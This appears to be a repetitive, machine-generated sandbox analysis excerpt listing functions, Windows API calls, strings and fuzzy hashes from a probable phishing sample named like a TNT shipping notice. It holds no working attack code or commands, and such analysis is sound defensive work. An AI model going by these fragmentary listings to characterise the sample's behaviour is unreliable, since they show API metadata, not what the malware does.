                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                      • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                      • CloseHandle.KERNEL32(00000000), ref: 00430113
                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                      • GlobalFree.KERNEL32(00000000), ref: 00430150
                                      • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                      • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                      • DeleteObject.GDI32(?), ref: 004301D0
                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                      • String ID:
                                      • API String ID: 3969911579-0
                                      • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                      • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                      • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                      • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                      Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                      • String ID: 0
                                      • API String ID: 956284711-4108050209
                                      • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                      • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                      • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                      • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                      Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                      • String ID: 0.0.0.0
                                      • API String ID: 1965227024-3771769585
                                      • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                      • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                      • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                      • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                      Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: SendString$_memmove_wcslen
                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                      • API String ID: 369157077-1007645807
                                      • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                      • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                      • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                      • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                      Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32 ref: 00445BF8
                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                      • __wcsicoll.LIBCMT ref: 00445C33
                                      • __wcsicoll.LIBCMT ref: 00445C4F
                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$ClassMessageNameParentSend
                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                      • API String ID: 3125838495-3381328864
                                      • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                      • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                      • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                      • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                      Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                      • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                      • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                      • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                      • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend$CharNext
                                      • String ID:
                                      • API String ID: 1350042424-0
                                      • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                      • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                      • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                      • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                      Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                        • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                      • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                      • _wcscpy.LIBCMT ref: 004787E5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                      • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                      • API String ID: 3052893215-2127371420
                                      • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                      • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                      • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                      • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                      Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                      • __swprintf.LIBCMT ref: 0045E7F7
                                      • _wprintf.LIBCMT ref: 0045E8B3
                                      • _wprintf.LIBCMT ref: 0045E8D7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                      • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 2295938435-2354261254
                                      • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                      • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                      • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                      • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                      Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __swprintf_wcscpy$__i64tow__itow
                                      • String ID: %.15g$0x%p$False$True
                                      • API String ID: 3038501623-2263619337
                                      • Opcode ID: fa1d6aa92a1fd950598fc85aadec7cc4031e0e4106e2d0b6ea716c15020f9163
                                      • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                      • Opcode Fuzzy Hash: fa1d6aa92a1fd950598fc85aadec7cc4031e0e4106e2d0b6ea716c15020f9163
                                      • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                      Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                      • __swprintf.LIBCMT ref: 0045E5F6
                                      • _wprintf.LIBCMT ref: 0045E6A3
                                      • _wprintf.LIBCMT ref: 0045E6C7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                      • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 2295938435-8599901
                                      • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                      • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                      • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                      • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                      Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • timeGetTime.WINMM ref: 00443B67
                                        • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                      • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                      • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                      • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                      • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                      • IsWindow.USER32(00000000), ref: 00443C3A
                                      • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                        • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                        • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                        • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                      • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                      • String ID: BUTTON
                                      • API String ID: 1834419854-3405671355
                                      • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                      • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                      • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                      • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                      Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                      • LoadStringW.USER32(00000000), ref: 00454040
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • _wprintf.LIBCMT ref: 00454074
                                      • __swprintf.LIBCMT ref: 004540A3
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                      • API String ID: 455036304-4153970271
                                      • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                      • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                      • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                      • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                      Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                                      Download Yara Rule
                                      APIs
                                      • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                      • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                      • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                      • _memmove.LIBCMT ref: 00467EB8
                                      • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                      • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                      • _memmove.LIBCMT ref: 00467F6C
                                      • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                      • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                      • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                      • String ID:
                                      • API String ID: 2170234536-0
